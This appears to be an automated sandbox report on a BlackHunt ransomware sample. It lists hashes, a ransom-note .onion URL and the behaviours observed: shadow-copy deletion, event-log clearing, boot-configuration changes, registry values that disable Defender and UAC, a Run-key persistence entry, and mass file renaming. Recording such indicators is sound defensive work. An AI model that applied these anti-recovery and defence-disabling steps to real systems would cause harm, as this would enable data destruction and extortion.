Analysis
-
max time kernel
20s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:27
Static task
static1
Behavioral task
behavioral1
Sample
a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe
Resource
win10v2004-20231215-en
General
-
Target
a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe
-
Size
707KB
-
MD5
c56f14ebfb50f56534716c24033be0a4
-
SHA1
8423a17c6ac193884f4588520501f606625a06d8
-
SHA256
a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496
-
SHA512
d5e290b418980fc57d054e8e22622a4ef54aac8aa34a1444153727e50efc573f13a8afd8fac60d3cbea91c7965f24feed7b423c9d6160ad8f3f4645519537af3
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z80vnh:6uaTmkZJ+naie5OTamgEoKxLWyKh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 856 fsutil.exe 3684 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 996 wevtutil.exe 3184 wevtutil.exe 584 wevtutil.exe 4060 wevtutil.exe 3624 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2928 bcdedit.exe 308 bcdedit.exe 1600 bcdedit.exe 3564 bcdedit.exe -
Renames multiple (2898) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2592 wbadmin.exe 1676 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\A: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\P: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\M: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\L: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\B: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\X: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\V: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\N: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\Y: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\H: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\S: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\G: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\T: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\U: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\K: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\Z: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\Q: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\R: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\J: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\W: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened (read-only) \??\I: a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#BlackHunt_ReadMe.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#BlackHunt_ReadMe.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\plugins\keystore\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-util-enumerations.xml_hidden a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\#BlackHunt_ReadMe.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\id\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#BlackHunt_ReadMe.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.hta a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\CircleSubpicture.png a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jre7\lib\zi\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#BlackHunt_Private.key a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1976 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2868 vssadmin.exe 2384 vssadmin.exe 588 vssadmin.exe 2096 vssadmin.exe 1912 vssadmin.exe 272 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4048 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1136 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeRestorePrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeBackupPrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeTakeOwnershipPrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeAuditPrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeSecurityPrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeIncBasePriorityPrivilege 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Token: SeBackupPrivilege 2188 vssvc.exe Token: SeRestorePrivilege 2188 vssvc.exe Token: SeAuditPrivilege 2188 vssvc.exe Token: SeBackupPrivilege 2760 Process not Found Token: SeRestorePrivilege 2760 Process not Found Token: SeSecurityPrivilege 2760 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2864 wrote to memory of 3040 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 154 PID 2864 wrote to memory of 3040 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 154 PID 2864 wrote to memory of 3040 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 154 PID 2864 wrote to memory of 3040 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 154 PID 2864 wrote to memory of 2168 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 152 PID 2864 wrote to memory of 2168 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 152 PID 2864 wrote to memory of 2168 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 152 PID 2864 wrote to memory of 2168 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 152 PID 2864 wrote to memory of 1728 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 150 PID 2864 wrote to memory of 1728 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 150 PID 2864 wrote to memory of 1728 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 150 PID 2864 wrote to memory of 1728 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 150 PID 2864 wrote to memory of 2560 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 226 PID 2864 wrote to memory of 2560 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 226 PID 2864 wrote to memory of 2560 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 226 PID 2864 wrote to memory of 2560 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 226 PID 3040 wrote to memory of 1332 3040 cmd.exe 148 PID 3040 wrote to memory of 1332 3040 cmd.exe 148 PID 3040 wrote to memory of 1332 3040 cmd.exe 148 PID 2168 wrote to memory of 1432 2168 cmd.exe 147 PID 2168 wrote to memory of 1432 2168 cmd.exe 147 PID 2168 wrote to memory of 1432 2168 cmd.exe 147 PID 2864 wrote to memory of 2656 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 144 PID 2864 wrote to memory of 2656 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 144 PID 2864 wrote to memory of 2656 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 144 PID 2864 wrote to memory of 2656 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 144 PID 2864 wrote to memory of 2696 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 143 PID 2864 wrote to memory of 2696 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 143 PID 2864 wrote to memory of 2696 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 143 PID 2864 wrote to memory of 2696 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 143 PID 2864 wrote to memory of 2608 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 142 PID 2864 wrote to memory of 2608 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 142 PID 2864 wrote to memory of 2608 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 142 PID 2864 wrote to memory of 2608 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 142 PID 2864 wrote to memory of 2464 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 139 PID 2864 wrote to memory of 2464 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 139 PID 2864 wrote to memory of 2464 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 139 PID 2864 wrote to memory of 2464 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 139 PID 2560 wrote to memory of 3024 2560 WMIADAP.EXE 138 PID 2560 wrote to memory of 3024 2560 WMIADAP.EXE 138 PID 2560 wrote to memory of 3024 2560 WMIADAP.EXE 138 PID 2656 wrote to memory of 2744 2656 cmd.exe 137 PID 2656 wrote to memory of 2744 2656 cmd.exe 137 PID 2656 wrote to memory of 2744 2656 cmd.exe 137 PID 2864 wrote to memory of 2672 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 136 PID 2864 wrote to memory of 2672 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 136 PID 2864 wrote to memory of 2672 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 136 PID 2864 wrote to memory of 2672 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 136 PID 2864 wrote to memory of 2752 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 134 PID 2864 wrote to memory of 2752 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 134 PID 2864 wrote to memory of 2752 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 134 PID 2864 wrote to memory of 2752 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 134 PID 1728 wrote to memory of 2480 1728 cmd.exe 132 PID 1728 wrote to memory of 2480 1728 cmd.exe 132 PID 1728 wrote to memory of 2480 1728 cmd.exe 132 PID 2864 wrote to memory of 2220 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 181 PID 2864 wrote to memory of 2220 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 181 PID 2864 wrote to memory of 2220 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 181 PID 2864 wrote to memory of 2220 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 181 PID 2864 wrote to memory of 2592 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 167 PID 2864 wrote to memory of 2592 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 167 PID 2864 wrote to memory of 2592 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 167 PID 2864 wrote to memory of 2592 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 167 PID 2864 wrote to memory of 2504 2864 a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe 129 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
